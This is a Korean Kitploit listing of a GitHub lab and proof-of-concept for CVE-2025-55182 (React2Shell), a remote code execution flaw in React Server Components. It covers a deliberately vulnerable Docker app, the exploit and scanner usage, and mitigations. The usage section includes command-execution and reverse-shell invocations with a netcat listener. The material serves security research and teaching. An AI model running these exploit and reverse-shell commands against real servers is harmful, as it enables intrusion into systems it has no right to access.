Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2025-55182-poc — CVE-2025-55182 (React2Shell)에 대한 실습 환경 및 PoC 익스플로잇으로, React Server Components의 심각한 RCE 취약점입니다. 취약한 앱, 익스플로잇 스크립트, 스캐너를 포함하며 보안 연구 및 교육 목적으로 제공됩니다. | Kitploit
도구/GitHubGitHub/mooowu/cve-2025-55182-poc
Vulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & EducationRemote Access ToolPayload DevelopmentLabs & Practice
GitHubmooowu/cve-2025-55182-poc

cve-2025-55182-poc

CVE-2025-55182 (React2Shell)에 대한 실습 환경 및 PoC 익스플로잇으로, React Server Components의 심각한 RCE 취약점입니다. 취약한 앱, 익스플로잇 스크립트, 스캐너를 포함하며 보안 연구 및 교육 목적으로 제공됩니다.

57개월 전아직 검토되지 않음
저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-55182 (React2Shell) 취약점 분석 실습 환경

이 저장소는 React 19.x 및 Next.js 15.x에 영향을 미치는 React Server Components(RSC)의 심각한 원격 코드 실행(RCE) 취약점인 CVE-2025-55182를 분석하고 재현하기 위한 완전한 환경을 제공합니다.

⚠️ 경고: 이 프로젝트는 의도적으로 취약한 코드를 포함하고 있습니다. 공용 서버나 프로덕션 환경에 배포하지 마십시오.

🔍 취약점 개요

  • CVE ID: CVE-2025-55182
  • 별칭: React2Shell
  • CVSS 점수: 10.0 (치명적)
  • 취약점 유형: CWE-502 (신뢰할 수 없는 데이터의 역직렬화)
  • 영향받는 구성 요소:
    • React Server Components (19.0.0 - 19.2.0)
    • Next.js (15.0.0 - 16.0.7)
    • react-server-dom-webpack, react-server-dom-turbopack

메커니즘

취약점은 React Server Components 런타임이 HTTP 요청(서버 액션)에서 직렬화된 데이터를 처리하는 방식에 존재합니다. 공격자는 악의적인 'Flight' 프로토콜 페이로드를 제작하여 서버가 역직렬화할 때 인증 확인이 이루어지기 전에 임의의 코드를 실행할 수 있습니다.

📂 프로젝트 구조

root@kitploit:~
react2shell/
├── vulnerable-app/       # 취약한 Next.js 15 애플리케이션
│   ├── app/
│   │   ├── actions.ts    # 취약한 서버 액션
│   │   └── page.tsx      # 취약점 테스트용 UI
│   ├── Dockerfile        # 컨테이너 정의
│   └── package.json
├── exploit/              # 익스플로잇 도구
│   ├── exploit.py        # Python PoC 익스플로잇
│   ├── scanner.py        # 취약점 스캐너
│   └── quick_exploit.sh  # 간단한 bash 익스플로잇
├── docs/                 # 분석 문서
└── docker-compose.yml    # 격리된 실습 환경

🚀 시작하기

사전 요구 사항

  • Docker 및 Docker Compose
  • Python 3.x (로컬에서 익스플로잇 실행용)

1. 실습 환경 시작하기

취약한 애플리케이션을 격리된 컨테이너에서 실행합니다:

root@kitploit:~
docker-compose up -d --build

애플리케이션은 http://localhost:3000에서 접근 가능합니다.

2. 애플리케이션 확인

브라우저에서 http://localhost:3000에 방문하세요. 여러 테스트 패널이 있는 'React2Shell Lab' 인터페이스가 표시됩니다:

  • 명령 실행: 직접적인 명령 인젝션 테스트
  • 안전하지 않은 역직렬화: JSON 기반 역직렬화 익스플로잇 테스트
  • 임의 파일 읽기: 경로 순회 테스트
  • 시스템 정보: 시스템 세부 정보 확인 (RCE 영향 확인용)

⚔️ 익스플로잇

취약점을 테스트하기 위한 여러 도구를 제공합니다.

Python 익스플로잇 사용

  1. 요구 사항 설치:

    root@kitploit:~
    pip install -r exploit/requirements.txt
    
  2. 취약한지 확인:

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 --check
    
  3. 명령 실행:

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 -c "id"
    
  4. 리버스 셸 (리스너 필요, 예: nc -lvnp 4444):

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 --revshell -l HOST_IP -p 4444
    

스캐너 사용

취약한 React/Next.js 인스턴스 스캔:

root@kitploit:~
python3 exploit/scanner.py -u http://localhost:3000

🛡️ 완화 조치

자신의 애플리케이션에서 이 취약점을 수정하려면:

  1. 종속성 업그레이드:

    • React를 19.3.0 이상으로 업그레이드하세요.
    • 브랜치에 따라 Next.js를 15.0.5, 15.1.9 또는 16.0.8로 업그레이드하세요.
  2. 패치 확인: package.json을 확인하여 react-server-dom-* 패키지가 업데이트되었는지 확인하세요.

📝 면책 조항

이 프로젝트는 교육 목적 및 보안 연구용으로만 제공됩니다. 저자는 이 자료의 오용에 대해 책임을 지지 않습니다.

도구 다운로드